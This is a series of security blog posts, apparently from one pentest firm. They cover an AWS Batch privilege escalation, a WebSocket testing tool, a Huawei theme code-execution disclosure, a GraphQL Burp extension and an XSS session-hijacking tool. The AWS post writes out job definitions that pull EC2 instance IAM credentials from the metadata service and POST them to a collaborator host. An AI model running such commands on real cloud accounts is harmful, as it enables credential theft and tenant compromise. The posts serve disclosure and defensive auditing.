Summarizing the previous points, it is a self-managed and self-scaling scheduler for tasks.

Its main components are:

  • Jobs. The unit of work, they can be shell scripts, executables, or a container image submitted to AWS Batch.

  • Job definitions. They are blueprints for the tasks. It is possible to grant them IAM roles to access AWS resources, set their memory and CPU requirements and even control container properties like environment variables or mount points for persistent storage

  • Job Queues. Submitted jobs are stacked in queues until they are scheduled onto a compute environment. Job queues can be associated with multiple compute environments and configured with different priority values.

  • Compute environments. Sets of managed or unmanaged compute resources that are usable to run jobs. With managed compute environments, you can choose the desired compute type (Fargate, EC2 and EKS) and deeply configure its resources. AWS Batch launches, manages, and terminates compute types as needed. You can also manage your own compute environments, but you’re responsible for setting up and scaling the instances in an Amazon ECS cluster that AWS Batch creates for you.

The scheme below (taken from the AWS documentation) shows the workflow for the service.

After a first look at AWS Batch basics, we can introduce the core differences in the managed compute environment types.

Orchestration Types In Managed Compute Environments

Fargate

AWS Batch jobs can run on AWS Fargate resources. AWS Fargate uses Amazon ECS to run containers and orchestrates their lifecycle.

This configuration fits cases where it is not needed to have control over the host machine running the container task. All the logic is embedded in the task and there is no need to add context from the host machine.

EC2

AWS Batch jobs can run on Amazon EC2 instances. It allows particular instance configurations like:

  • Settings for vCPUs, memory and/or GPU
  • Custom Amazon Machine Image (AMI) with launch templates
  • Custom environment parameters

This configuration fits scenarios where it is necessary to customize and control the containers’ host environment. As example, you may need to mount an Elastic File System (EFS) and share some folders with the running jobs.

EKS

AWS Batch doesn’t create, administer, or perform lifecycle operations of the EKS clusters. AWS Batch orchestration scales up and down nodes managed by AWS Batch and runs pods on those nodes.

The logic conditions are similar to the ECS case.

Running Tasks With Two Metadata Services & Two Roles - The Unwanted Role Exposition Case

While testing a multi-tenant platform, we managed to leverage AWS Batch to compromise the cloud environment and perform privilege escalation.

The single tenants were using AWS Batch to execute some computational work given a certain input to be processed (tenant data).

The task jobs of all tenants were initialized and executed using the EC2 orchestration type, hence, all batch containers were running the same task-runner EC2 instances.

The scheme below describes the observed scenario at a high-level.

The tenant data (input) was mounted on the EC2 spot instance prior to the execution with Elastic File System (EFS). As can be seen in the design scheme, the specific tenant input data was shared to batch job containers via precise shared folders.

This might seem as a secure and well-isolated environment, but it wasn’t.

In order to illustrate the final exploitation, a few IAM concepts about the vulnerable context must be explained:

  • Within the described design, the compute environment EC2 spot instances needed a specific role with highly privileged permissions to manage multiple services, including EFS to mount customers’ data

  • The task containers (batch jobs) had an execution role with the batch:RegisterJobDefinition and batch:SubmitJob permissions.

The Testing Phase

So, during testing we have obviously tried to execute code on the jobs to get access to some internal AWS credentials. Since the Instance Metadata Service (IMDS v2) was network restricted in the running containers, it was not possible to have an easy win by reaching 169.254.169.254 (IMDS IP).

Nevertheless, containers running in ECS and EKS have the Container Metadata Service (CMDS) running and reachable at 169.254.170.2 (did you know?). It is literally the doppelganger of the IMDS service, but for containers and pods in AWS.

Thanks to it, we were able to gather information about the running task. By looking at the AWS documentation, you can learn more about the many environment variables exposed to the running container. Among them, there is AWS_CONTAINER_CREDENTIALS_RELATIVE_URI.

In fact, the CMDS protects users against SSRF interactions by setting a dynamic credential endpoint saved as an environmental variable. By doing so, basic SSRFs cannot find out the pseudo-random part in it and retrieve credentials.

The screenshot below shows an interaction with the CMDS to get the credentials from a running container (our execution context).

At this point, we had the credentials for the ecs-role owned by the running jobs.

Among the ECS-related execution permissions, it had RegisterJobDefinition, SubmitJob and DescribeJobQueues for the AWS Batch service.

Since the basic threat model assumed that users had command execution on the running containers, a certain level of control over the job definitions was not an issue.

Hence, having the RegisterJobDefinition and SubmitJob permissions exposed in the user-controlled context was not considered a vulnerability in the first place.

So, the next question was pretty obvious:

The Turning Point

After many hours of dorking and code review, we managed to discover two additional details:

  • In the AWS Batch with EC2 compute environment, the jobs’ containers run with host network configuration. This means that Batch job containers use the host EC2 Spot instance’s networking directly
  • The platform was restricting the IMDS connectivity on job containers when the worker was starting the tasks

Due to these conditions, a batch job could call the IMDSv2 service on behalf of the host EC2 Spot instance if it started without the restrictions applied by the worker, potentially leading to a privilege escalation:

  1. An attacker with the leaked batch job credentials could use RegisterJobDefinition and SubmitJob to define and execute a malicious AWS Batch job.

  2. The malicious job is able to dialogue with the IMDS service on behalf of the host EC2 Spot instance since the network restrictions to the IMDS were not applied.

  3. In this way, it was possible to obtain credentials for the IAM Role owned by the EC2 Spot instances.

The compute environment EC2 spot instances needed a specific role with highly privileged permissions to manage multiple services, including EFS to mount customers’ data etc.

PrivEsc Exploitation

The exploitation phase required two job definitions to interact with the IMDSv2, one to get the instance IAM role name, and one to retrieve the IAM security credentials for the leaked role name.

Job Definition 1 - Getting the host EC2 Spot instance role name

$ aws batch register-job-definition --job-definition-name poc-get-rolename --type container --container-properties '{ "image": "curlimages/curl",
"vcpus": 1, "memory": 20, "command": [ "sh","-c","TOKEN=`curl -X PUT http://169.254.169.254/latest/api/token -H X-aws-ec2-metadata-token-ttl-seconds:21600`; curl -s -H X-aws-ec2-metadata-token:$TOKEN http://169.254.169.254/latest/meta-
data/iam/security-credentials/ > /tmp/out ; curl -d @/tmp/out -X POST http://BURP_COLLABORATOR/exfil; sleep 4m"]}'

After defining the job definition, submit a new job using the newly create job definition:

aws batch submit-job --job-name attacker-jb-getrolename --job-queue LowPriorityEc2 --job-definition poc-get-rolename --scheduling-priority-override 999 --share-identifier asd

Note: the job queue name was retrievable with aws batch describe-job-queues

The attacker collaborator server received something like:

POST /exfil HTTP/1.1
Host: fo78ichlaqnfn01sju2ck6ixwo2fqaez.oastify.com
User-Agent: curl/8.0.1-DEV
Accept: */*
Content-Length: 44
Content-Type: application/x-www-form-urlencoded

iam-instance-role-20230322003148155300000001

Job Definition 2 - Getting the credentials for the host EC2 Spot instance role

$ aws batch register-job-definition --job-definition-name poc-get-aimcreds --type container --container-properties '{ "image": "curlimages/curl",
"vcpus": 1, "memory": 20, "command": [ "sh","-c","TOKEN=`curl -X PUT http://169.254.169.254/latest/api/token -H X-aws-ec2-metadata-token-ttl-seconds:21600`; curl -s -H X-aws-ec2-metadata-token:$TOKEN http://169.254.169.254/latest/meta-
data/iam/security-credentials/ROLE_NAME > /tmp/out ; curl -d @/tmp/out -X POST http://BURP_COLLABORATOR/exfil; sleep 4m"]}'

Like for the previous definition, by submitting the job, the collaborator received the output.

POST /exfil HTTP/1.1
Host: 4otxi1haafn4np1hjj21kvimwd24qyen.oastify.com
User-Agent: curl/8.0.1-DEV
Accept: */*
Content-Length: 1430
Content-Type: application/x-www-form-urlencoded

{"RoleArn":"arn:aws:iam::1235122316123:role/ecs-role","AccessKeyId":"<redacted>","SecretAccessKey":"<redacted>","Token":"<redacted>","Expiration":"2023-03-22T06:54:42Z"}

This time it contained the AWS credentials for the host EC2 Spot instance role.

Privilege escalation achieved! The obtained role allowed us to access other tenants’ data and do much more.

Default Host Network Mode In AWS Batch With EC2 Orchestration

In AWS Batch with EC2 compute environments, the containers run with bridged network mode.

With such configuration, the containers (batch jobs) have access to both the EC2 IMDS and the CMDS.

The issue lies in the fact that the container job is able to dialogue with the IMDSv2 service on behalf of the EC2 Spot instance because they share the same network interface.

In conclusion, it is very important to know about such behavior and avoid the possibility of introducing privilege escalation patterns while designing cloud environments.

For cloud security auditors

When the platform uses AWS Batch compute environments with EC2 orchestration, answer the following questions:

  • Always keep in consideration the security of the AWS Batch jobs and their possible compromise. A threat actor could escalate vertically/horizontally and gain more access into the cloud infrastructure.
    • Which aspects of the job execution are controllable by the external user?
    • Is command execution inside the jobs intended by the platform?
      • If yes, investigate the permissions available through the CMDS
      • If no, attempt to achieve command execution within the jobs’ context
    • Is the IMDS restricted from the job execution context?
  • Which types of Compute Environments are used in the platform?
    • Are there any Compute Environments configured with EC2 orchestration?
      • If yes, which role is assigned to EC2 Spot Instances?

Note: The dangerous behavior described in this blogpost also applies to configurations involving Elastic Container Service (ECS) tasks with EC2 launch type.

For developers

Developers should be aware of the fact that AWS Batch with EC2 compute environments will run containers with host network configuration. Consequently, the executed containers (batch jobs) have access to both the CMDS for the task role and the IMDS for the host EC2 Spot Instance role.

In order to prevent privilege escalation patterns, Job runs must match the following configurations:

  • Having the IMDS restricted at network level in running jobs. Read the documentation here

  • Restricting the batch job execution role and job role IAM permissions. In particular, avoid assigning RegisterJobDefinition and SubmitJob permissions in job-related or accessible policies to prevent uncontrolled execution by attackers landing on the job context

If both configurations are not applicable in your design, consider changing the orchestration type.

Note: Once again, the dangerous behavior described in this blogpost also applies to configurations involving Elastic Container Service (ECS) tasks with the EC2 launch type.

Hands-On IaC Lab

As promised in the series’ introduction, we developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/

Stay tuned for the next episode!

Resources

Streamlining Websocket Pentesting with wsrepl

17 July 2023 at 22:00

In an era defined by instant gratification, where life zips by quicker than a teenager’s TikTok scroll, WebSockets have evolved into the heartbeat of web applications. They’re the unsung heroes in data streaming and bilateral communication, serving up everything in real-time, because apparently, waiting is so last century.

However, when tasked with pentesting these WebSockets, it feels like you’re juggling flaming torches on a unicycle, atop a tightrope! Existing tools, while proficient in their specific realms, are much like mismatched puzzle pieces – they don’t quite fit together, leaving you to bridge the gaps. Consequently, you find yourself shifting from one tool to another, trying to manage them simultaneously and wishing for a more streamlined approach.

That’s where https://github.com/doyensec/wsrepl comes to the rescue. This tool, the latest addition to Doyensec’s security tools, is designed to simplify auditing of websocket-based apps. wsrepl strikes a much needed balance by offering an interactive REPL interface that’s user-friendly, while also being conveniently easy to automate. With wsrepl, we aim to turn the tide in websocket pentesting, providing a tool that is as efficient as it is intuitive.

The Doyensec Challenge

Once upon a time, we took up an engagement with a client whose web application relied heavily on WebSockets for soft real-time communication. This wasn’t an easy feat. The client had a robust bug bounty policy and had undergone multiple pentests before. Hence, we were fully aware that the lowest hanging fruits were probably plucked. Nevertheless, as true Doyensec warriors (‘doyen’ - a term Merriam-Webster describes as ‘a person considered to be knowledgeable or uniquely skilled as a result of long experience in some field of endeavor’), we were prepared to dig deeper for potential vulnerabilities.

Our primary obstacle was the application’s custom protocol for data streaming. Conventional wisdom among pentesters suggests that the most challenging targets are often the ones most overlooked. Intriguing, isn’t it?

The Quest for the Perfect Tool

The immediate go-to tool for pentesting WebSockets would typically be Burp Suite. While it’s a heavyweight in web pentesting, we found its implementation of WebSockets mirrored HTTP requests a little bit too closely, which didn’t sit well with near-realtime communications.

Sure, it does provide a neat way to get an interactive WS session, but it’s a bit tedious - navigating through ‘Upgrade: websocket’, hopping between ‘Repeater’, ‘Websocket’, ‘New WebSocket’, filling in details, and altering HTTP/2 to HTTP/1.1. The result is a decent REPL but the process? Not so much.

Initiating a new websocket in Burp

Don’t get me wrong, Burp does have its advantages. Pentesters already have it open most times, it highlights JSON or XML, and integrates well with existing extensions. Despite that, it falls short when you have to automate custom authentication schemes, protocols, connection tracking, or data serialization schemes.

Other tools, like websocketking.com and hoppscotch.io/realtime/websocket, offer easy-to-use and aesthetically pleasing graphical clients within the browser. However, they lack comprehensive options for automation. Tools like websocket-harness and WSSiP bridge the gap between HTTP and WebSockets, which can be useful, but again, they don’t offer an interactive REPL for manual inspection of traffic.

Finally, we landed on websocat, a netcat inspired command line WebSockets client that comes closest to what we had in mind. While it does offer a host of features, it’s predominantly geared towards debugging WebSocket servers, not pentesting.

wsrepl: The WebSockets Pentesting Hero

Enter wsrepl, born out of necessity as our answer to the challenges we faced. It is not just another pentesting tool, but an agile solution that sits comfortably in the middle - offering an interactive REPL experience while also providing simple and convenient path to automation.

Built with Python’s fantastic TUI framework Textual, it enables an accessible experience that is easy to navigate both by mouse and keyboard. That’s just scratching the surface though. Its interoperability with curl’s arguments enables a fluid transition from the Upgrade request in Burp to wsrepl. All it takes is to copy a request through ‘Copy as curl command’ menu option and replace curl with wsrepl.

Initiating a new WebSocket in wsrepl

On the surface, wsrepl is just like any other tool, showing incoming and outgoing traffic with the added option of sending new messages. The real magic however, is in the details. It leaves nothing to guesswork. Every hexadecimal opcode is shown as per RFC 6455, a feature that could potentially save you from many unnecessary debugging hours.

A lesson learned

Here’s an anecdote to illustrate this point. At the beginning of our engagement with WebSockets, I wasn’t thoroughly familiar with the WebSocket RFC and built my understanding based on what Burp showed me. However, Burp was only displaying text messages, obscuring message opcodes and autonomously handling pings without revealing them in the UI. This partial visibility led to some misconceptions about how WebSockets operate. The developers of the service we were testing seemingly had the same misunderstanding, as they implemented ping traffic using 0x1 - text type messages. This caused confusion and wasted time when my scripts kept losing the connection, even though the traffic appeared to align with my Burp observations.

To avoid similar pitfalls, wsrepl is designed to give you the whole picture, without any hidden corners. Here’s a quick rundown of WebSocket opcodes defined in RFC6544 that you can expect to see in wsrepl:

Opcode Description
0x0 Continuation Frame
0x1 Text Frame
0x2 Binary Frame
0x8 Connection Close
0x9 Ping
0xA Pong (must carry the same payload as the corresponding Ping frame)

Contrary to most WebSocket protocols that mainly use 0x1 type messages, wsrepl accompanies all messages with their opcodes, ensuring full transparency. We’ve intentionally made the decision not to conceal ping traffic by default, although you have the choice to hide them using the --hide-ping-pong option.

Additionally, wsrepl introduces the unique capability of sending ‘fake’ ping messages, that use the 0x1 message frame. Payloads can be defined with options --ping-0x1-payload and --pong-0x1-payload, and the interval controlled by --ping-0x1-interval. It also supports client-induced ping messages (protocol level, 0x9), even though typically this is done by the server: --ping-interval.

It’s also noteworth that wsrepl incorporates an automatic reconnection feature in case of disconnects. Coupled with granular ping control, these features empower you to initiate long-lasting and stable WebSocket connections, which have proven useful for executing certain attacks.

Automation Made Simple with wsrepl

Moreover, wsrepl is crafted with a primary goal in mind: enabling you to quickly transition into WebSocket automation. To do this, you just need to write a Python plugin, which is pretty straightforward and, unlike Burp, feels quintessentially pythonic.

from wsrepl import Plugin

MESSAGES = [
    "hello",
    "world"
]

class Demo(Plugin):
    """Demo plugin that sends a static list of messages to the server."""
    def init(self):
        self.messages = MESSAGES

It’s Python, so really, the sky’s the limit. For instance, here is how to send a HTTP request to acquire the auth token, and then use it to authenticate with the WebSocket server:

from wsrepl import Plugin
from wsrepl.WSMessage import WSMessage

import json
import requests

class Demo(Plugin):
    """Demo plugin that dynamically acquires authentication token."""
    def init(self):
        # Here we simulate an API request to get a session token by supplying a username and password.
        # For the demo, we're using a dummy endpoint "https://hb.cran.dev/uuid" that returns a UUID.
        # In a real-life scenario, replace this with your own authentication endpoint and provide necessary credentials.
        token = requests.get("https://hb.cran.dev/uuid").json()["uuid"]

        # The acquired session token is then used to populate self.messages with an authentication message.
        # The exact format of this message will depend on your WebSocket server requirements.
        self.messages = [
            json.dumps({
                "auth": "session",
                "sessionId": token
            })
        ]

The plugin system is designed to be as flexible as possible. You can define hooks that are executed at various stages of the WebSocket lifecycle. For instance, you can use on_message_sent to modify messages before they are sent to the server, or on_message_received to parse and extract meaningful data from the server’s responses. The full list of hooks is as follows:

Order of wsrepl hook execution

Customizing the REPL UI

The true triumph of wsrepl lies in its capacity to automate even the most complicated protocols. It is easy to add custom serialization routines, allowing you to focus on the stuff that matters.

Say you’re dealing with a protocol that uses JSON for data serialization, and you’re only interested in a single field within that data structure. wsrepl allows you to hide all the boilerplate, yet preserve the option to retrieve the raw data when necessary.

from wsrepl import Plugin

import json
from wsrepl.WSMessage import WSMessage

class Demo(Plugin):
    async def on_message_sent(self, message: WSMessage) -> None:
        # Grab the original message entered by the user
        original = message.msg

        # Prepare a more complex message structure that our server requires.
        message.msg = json.dumps({
            "type": "message",
            "data": {
                "text": original
            }
        })

        # Short and long versions of the message are used for display purposes in REPL UI.
        # By default they are the same as 'message.msg', but here we modify them for better UX.
        message.short = original
        message.long = message.msg


    async def on_message_received(self, message: WSMessage) -> None:
        # Get the original message received from the server
        original = message.msg

        try:
            # Try to parse the received message and extract meaningful data.
            # The exact structure here will depend on your websocket server's responses.
            message.short = json.loads(original)["data"]["text"]
        except:
            # In case of a parsing error, let's inform the user about it in the history view.
            message.short = "Error: could not parse message"

        # Show the original message when the user focuses on it in the UI.
        message.long = original

In conclusion, wsrepl is designed to make your WebSocket pentesting life easier. It’s the perfect blend of an interactive REPL experience with the ease of automation. It may not be the magical solution to every challenge you’ll face in pentesting WebSockets, but it is a powerful tool in your arsenal. Give it a try and let us know your experiences!

Huawei Theme Manager Arbitrary Code Execution

25 July 2023 at 22:00

Back in 2019, we were lucky enough to take part in the newly-launched Huawei mobile bug bounty. For that, we decided to research Huawei’s Themes.

The Themes Manager allows custom themes on EMUI devices to stylize preferences, and the customization of lock screens, wallpapers and icons. Processes capable of making these types of system-wide changes need to have elevated privileges, making them valuable targets for research as well as exploitation.

Background

When it comes to implementing a lockscreen on EMUI, there were three possible engines used:

  • com.ibimuyu.lockscreen
  • com.vlife.huawei.emuilock
  • com.huawei.ucdlockscreen

When installing a theme, the SystemUI.apk verifies the signature of the application attempting to make these changes against a hardcoded list of trusted ones. From what we observed, this process seems to have been implemented properly, with no clear way to bypass the signature checks.

That said, we discovered that when com.huawei.ucdlockscreen was used, it loaded additional classes at runtime. The signatures of these classes were not validated properly, nor were they even checked. This presented an opportunity for us to introduce our own code.

Taking a look at the structure of the theme archive files (.hwt), we see that the unlock screen elements are packaged as follows:

Archive Structure

Looking in the unlock directory, we saw the theme.xml file, which is a manifest specifying several properties. These settings included the dynamic unlock engine to use (ucdscreenlock in our case) and an ext.properties file, which allows for dynamic Java code loading from within the theme file.

Let’s look at the file content:

Archive Structure

This instructs the dynamic engine (com.huawei.ucdlockscreen) to load com.huawei.nova.ExtensionJarImpl at runtime from the NOVA6LockScreen2019120501.apk. Since this class is not validated, we can introduce our own code to achieve arbitrary code execution. What makes this even more interesting is that our code will run within a process of a highly privileged application (com.huawei.android.thememanager), as shown below.

Privileged Application List

Utilizing the logcat utility, we can see the dynamic loading process:

Process Logs

This vulnerability was confirmed via direct testing on EMUI 9.1 and 10, but appears to impact the current version of EMUI with some limitations*.

Theme in foreground with logcat in back

Impact

As previously mentioned, this results in arbitrary code execution using the PID of a highly privileged application. In our testing, exploitation resulted in obtaining around 200 Android and Huawei custom permissions. Among those were the permissions listed below which could result in total compromise of the device’s user data, sensitive system data, any credentials entered into the system and the integrity of the system’s environment.

Permissions List

Considering that the application can send intents requiring the huawei.android.permission.HW_SIGNATURE_OR_SYSTEM permission, we believe it is possible to leverage existing system functionalities to obtain system level code execution. Once achieved, this vulnerability has great potential as part of a rooting chain.

Exploitability

This issue can be reliably exploited with no technical impediments. That said, exploitation requires installing a custom theme. To accomplish this remotely, user interaction is required. We can conceive of several plausible social engineering scenarios which could be effective or perhaps use a second vulnerability to force the download and installation of themes. Firstly, it is possible to gift themes to other users, so a compromised trusted contact could be leveraged (or spoofed) to convince a victim to accept and install the malicious theme. As an example, the following URL will open the theme gift page: hwt://www.huawei.com/themes?type=33&id=0&from=AAAA&channelId=BBB

Theme gifting attack flow

Secondly, an attacker could publish a link or QR code pointing to the malicious theme online, then convince a victim into triggering the HwThemeManager application via a deep link using the hwt:// scheme.

To be fair, we must acknowledge that Huawei has a review process in place for new themes and wallpapers, which might limit the use of live themes exploiting this vulnerability.

Partial fix

Huawei released an update for HwThemeManager on February 24, 2022 (internally tracked as HWPSIRT-2019-12158) stating this was resolved. Despite this, we believe the issue was actually resolved in ucdlockscreen.apk (com.huawei.ucdlockscreen version 3 and later).

This is an important distinction, because the latest version of the ucdlockscreen.apk is installed at runtime by HwThemeManager, after applying a theme that requires such an engine. Even on a stock phone (both EMUI 9,10 and latest 12.0.0.149), an attacker with physical access can uninstall the latest version and install the old vulnerable version since it is properly signed by Huawei.

Without further mitigations from Huawei, an attacker with physical access to the device can still leverage this vulnerability to gain system privileged access on even the latest devices.

Further discovery

After a few hours of reverse engineering the fix introduced in the latest version of com.huawei.ucdlockscreen (version 4.6), we discovered an additional bypass impacting the EMUI 9.1 release. This issue doesn’t require physical access and can again trigger the same exploitable condition.

During theme loading, the latest version of com.huawei.ucdlockscreen checks for the presence of a /data/themes/0/unlock/ucdscreenlock/error file. Since all of the files within /data/themes/0/ are copied from the provided theme (.hwt) file they can all be attacker-controlled.

This file is used to check the specific version of the theme. An attacker can simply embed an error file referencing an older version, forcing legacy theme support. When doing so, an attacker would also specify a fictitious package name in the ext.properties file. This combination of changes in the malicious .hwt file bypasses all the required checks - making the issue exploitable again on the latest EMUI9.1, with no physical access required. At the time of our investigation, the other EMUI major versions appear to implement signature validation mechanisms to mitigate this.

Disclosure

This issue was disclosed on Dec 31, 2019 according to the terms of the Huawei Mobile Bug Bounty, and it was addressed by Huawei as described above. Additional research results were reported to Huawei on Sep 1, 2021. Given the time that has elapsed from the original fix and the fact that we believe the issue is no longer remotely exploitable, we have decided to release the details of the vulnerability.

At the time of writing this post (April 28th, 2023), the issue is still exploitable locally on the latest EMUI (12.0.0.149) by force-loading the vulnerable ucdlockscreen.apk. We have decided not to release the vulnerable version of ucdlockscreen.apk as well as the malicious theme proof-of-concept. While the issue is no longer interesting to attackers, it can still benefit the rooting community and facilitate the work of security researchers in identifying issues within Huawei’s EMUI-based devices.

Conclusions

While the vulnerability is technically interesting by itself, there are two security engineering learning lessons here. The biggest takeaway is clearly that while relying on signature validation for authenticating software components can be an effective security measure, it must be thoroughly extended to include any dynamically loaded code. That said, it appears Huawei no longer provides bootloader unlock options (see here) making rooting more complicated and expensive. It remains to be seen if this bug is ever used as part of a chain developed by the rooting community.

A secondary engineering lesson is to ensure that when we design backwards compatibility mechanisms, we should assume that there may be older versions that we want to abandon.

This research was made possible by the Huawei Mobile Phone Bug Bounty Program. We want to thank the Huawei PSIRT for their help in handling this issue, the generous bounty and the openness to disclose the details.

InQL v5: A Technical Deep Dive

16 August 2023 at 22:00

We’re thrilled to pull back the curtain on the latest iteration of our widely-used Burp Suite extension - InQL. Version 5 introduces significant enhancements and upgrades, solidifying its place as an indispensable tool for penetration testers and bug bounty hunters.

InQL v5.0

Introduction

The cybersecurity landscape is in a state of constant flux. As GraphQL adoption surges, the demand for an adaptable, resilient testing tool has become paramount. As leaders in GraphQL security, Doyensec is proud to reveal the most recent iteration of our open-source testing tool - InQL v5.x. This isn’t merely an update; it’s a comprehensive revamp designed to augment your GraphQL testing abilities.

The Journey So Far: From Jython to Kotlin

Our journey with InQL started on the Jython platform. However, as time went by, we began to experience the limitations of Jython - chiefly, its lack of support for Python 3, which made it increasingly difficult to find compatible tooling and libraries. It was clear a transition was needed. After careful consideration, we chose Kotlin. Not only is it compatible with Java (which Burp is written in), but it also offers robustness, flexibility, and a thriving developer community.

The Challenges of Converting a Burp Extension Into Kotlin

We opted to include the entire Jython runtime (over 40 MB) within the Kotlin extension to overcome the challenges of reusing the existing Jython code. Although it wasn’t the ideal solution, this approach allowed us to launch the extension as Kotlin, initiate the Jython interpreter, and delegate execution to the older Jython code.

class BurpExtender: IBurpExtender, IExtensionStateListener, BurpExtension {

    private var legacyApi: IBurpExtenderCallbacks? = null
    private var montoya: MontoyaApi? = null

    private var jython: PythonInterpreter? = null
    private var pythonPlugin: PyObject? = null

    // Legacy API gets instantiated first
    override fun registerExtenderCallbacks(callbacks: IBurpExtenderCallbacks) {

        // Save legacy API for the functionality that still relies on it
        legacyApi = callbacks

        // Start embedded Python interpreter session (Jython)
        jython = PythonInterpreter()
    }

    // Montoya API gets instantiated second
    override fun initialize(montoyaApi: MontoyaApi) {
        // The new Montoya API should be used for all of the new functionality in InQL
        montoya = montoyaApi

        // Set the name of the extension
        montoya!!.extension().setName("InQL")

        // Instantiate the legacy Python plugin
        pythonPlugin = legacyPythonPlugin()

        // Pass execution to legacy Python code
        pythonPlugin!!.invoke("registerExtenderCallbacks")
    }

    private fun legacyPythonPlugin(): PyObject {
        // Make sure UTF-8 is used by default
        jython!!.exec("import sys; reload(sys); sys.setdefaultencoding('UTF8')")

        // Pass callbacks received from Burp to Python plugin as a global variable
        jython!!.set("callbacks", legacyApi)
        jython!!.set("montoya", montoya)

        // Instantiate legacy Python plugin
        jython!!.exec("from inql.extender import BurpExtenderPython")
        val legacyPlugin: PyObject = jython!!.eval("BurpExtenderPython(callbacks, montoya)")

        // Delete global after it has been consumed
        jython!!.exec("del callbacks, montoya")

        return legacyPlugin
    }

Sidestepping the need for stickytape

Our switch to Kotlin also solved another problem. Jython extensions in Burp Suite are typically a single .py file, but the complexity of InQL necessitates a multi-file layout. Previously, we used the stickytape library to compress the Python code into a single file. However, stickytape introduced subtle bugs and inhibited access to static files. By making InQL a Kotlin extension, we can now bundle all files into a JAR and access them correctly.

Introducing GQLSpection: The Core of InQL v5.x

A significant milestone in our transition journey involved refactoring the core portion of InQL that handles GraphQL schema parsing. The result is GQLSpection - a standalone library compatible with Python 2/3 and Jython, featuring a convenient CLI interface. We’ve included all GraphQL code examples from the GraphQL specification in our test cases, ensuring comprehensive coverage.

As an added advantage, it also replaces the standalone and CLI modes of the previous InQL version, which were removed to streamline our code base.

GQLSpection

New Features

Our clients rely heavily on cutting-edge technologies. As such, we frequently have the opportunity to engage with real-world GraphQL deployments in many of our projects. This rich exposure has allowed us to understand the challenges InQL users face and the requirements they have, enabling us to decide which features to implement. In response to these insights, we’ve introduced several significant features in InQL v5.0 to support more effective and efficient audits and investigations.

Points of Interest

One standout feature in this version is ‘Points of Interest’. Powered by GQLSpection and with the initial implementation contributed by @schoobydrew, this is essentially a keyword scan equipped with several customizable presets.

Points of Interest settings

The Points of Interest scan proves exceptionally useful when analyzing extensive schemas with over 50 queries/mutations and thousands of fields. It produces reports in both human-readable text and JSON format, providing a high-level overview of the vast schemas often found in modern apps, and aiding pentesters in swiftly identifying sensitive data or dangerous functionality within the schema.

Points of Interest results

Improved Logging

One of my frustrations with earlier versions of the tool was the lack of useful error messages when the parser broke on real-world schemas. So, I introduced configurable logging. This, coupled with the fact that parsing functionality is now handled by GQLSpection, has made InQL v5.0 much more reliable and user-friendly.

In-line Annotations

Another important addition to InQL are the annotations. Prior to this, InQL only generated the bare minimum query, necessitating the use of other tools to deduce the correct input format, expected values, etc. However, with the addition of inline comments populated with content from ‘description’ fields from the GraphQL schema or type annotations, InQL v5.0 has become much more of a standalone tool.

Annotations

There is a trade-off here: while the extensive annotations make InQL more usable, they can sometimes make it hard to comprehend and navigate. We’re looking at solutions for future releases to dynamically limit the display of annotations.

The Future of InQL and GraphQL Security

Our roadmap for InQL is ambitious. Having said that, we are committed to reintroduce features like GraphiQL and Circular Relationship Detection, achieving full feature parity with v4.

As GraphQL continues to grow, ensuring robust security is crucial. InQL’s future involves addressing niche GraphQL features that are often overlooked and improving upon existing pentesting tools. We look forward to sharing more developments with the community.

InQL: A Great Project for Students and Contributors

InQL is not just a tool, it’s a project – a project that invites the contributions of those who are passionate about cybersecurity. We’re actively seeking students and developers who would like to contribute to InQL or do GraphQL-adjacent security research. This is an opportunity to work with experts in GraphQL security, and play a part in shaping the future of InQL.

DoyensecInQL

Conclusion

InQL v5.x is the result of relentless work and an unwavering commitment to enhancing GraphQL security. We urge all pentesters, bug hunters, and cybersecurity enthusiasts working with GraphQL to try out this new release. If you’ve tried InQL in the past and are looking forward to enhancements, v5.0 will not disappoint.

At Doyensec, we’re not just developing a tool, we’re pushing the boundaries of what’s possible in GraphQL security. We invite you to join us on this journey, whether as a user, contributor, or intern.

Happy Hacking!

Introducing Session Hijacking Visual Exploitation (SHVE): An Innovative Open-Source Tool for XSS Exploitation

31 August 2023 at 04:00

SHVE-logo

Greetings, folks! Today, we’re thrilled to introduce you to our latest tool: Session Hijacking Visual Exploitation, or SHVE. This open-source tool, now available on our GitHub, offers a novel way to hijack a victim’s browser sessions, utilizing them as a visual proxy after hooking via an XSS or a malicious webpage. While some exploitation frameworks, such as BeEF, do provide hooking features, they don’t allow remote visual interactions.

SHVE’s interaction with a victim’s browser in the security context of the user relies on a comprehensive design incorporating multiple elements. These components, each fulfilling a specific function, form a complex, interconnected system that allows a precise and controlled session hijacking. Let’s take a closer look at each of them:

  • VictimServer: This component serves the malicious JavaScript. Furthermore, it establishes a WebSocket connection to the hooked browsers, facilitating the transmission of commands from the server to the victim’s browser.

  • AttackerServer: This is the connection point for the attacker client. It supplies all the necessary information to the attacker, such as the details of the different hooked sessions.

  • Proxy: When the client enters Visual or Interactive mode, it connects to this proxy. The proxy, in turn, uses functionalities provided by the VictimServer to conduct all requests through the hooked browser.

SHVE-architecture

The tool comes with two distinctive modes - Visual and Interactive - for versatile usage.

  • Visual Mode: The tool provides a real-time view of the victim’s activities. This is particularly useful when exploiting an XSS, as it allows the attacker to witness the victim’s interactions that otherwise might be impossible to observe. For instance, if a victim accesses a real-time chat that isn’t stored for later review, the attacker could see this live interaction.

  • Interactive Mode: This mode provides a visual gateway to any specified web application. Since the operations are carried out using the victim’s security context via the hooked browser, detection from the server-side becomes significantly more challenging. Unlike typical XSS or CORS misconfigurations exploitation, there’s no need to steal information like Cookies or Local Storage. Instead, the tool uses XHR requests, ensuring CSRF tokens are automatically sent, as both victim and attacker view the same HTML.

Getting Started

We’ve tried to make the installation process as straightforward as possible. You’ll need to have Node.js and npm installed on your system. After cloning our repository, navigate to the server and client directories to install their respective dependencies. Start the server and client, follow the initial setup steps, and you’re ready to go! For the full installation guide, please refer to the README file.

We’ve recorded a video showcasing these modes and demonstrating how to exploit XSS and CORS misconfigurations using one of the Portswigger’s Web Security Academy labs. Here is how SHVE works:

We look forward to your contributions and insights, and can’t wait to see how you’ll use SHVE in your red team engagements. Happy hacking!

Thanks to Michele Orru and Giuseppe Trotta for their early-stage feedback and ideas.

❌
❌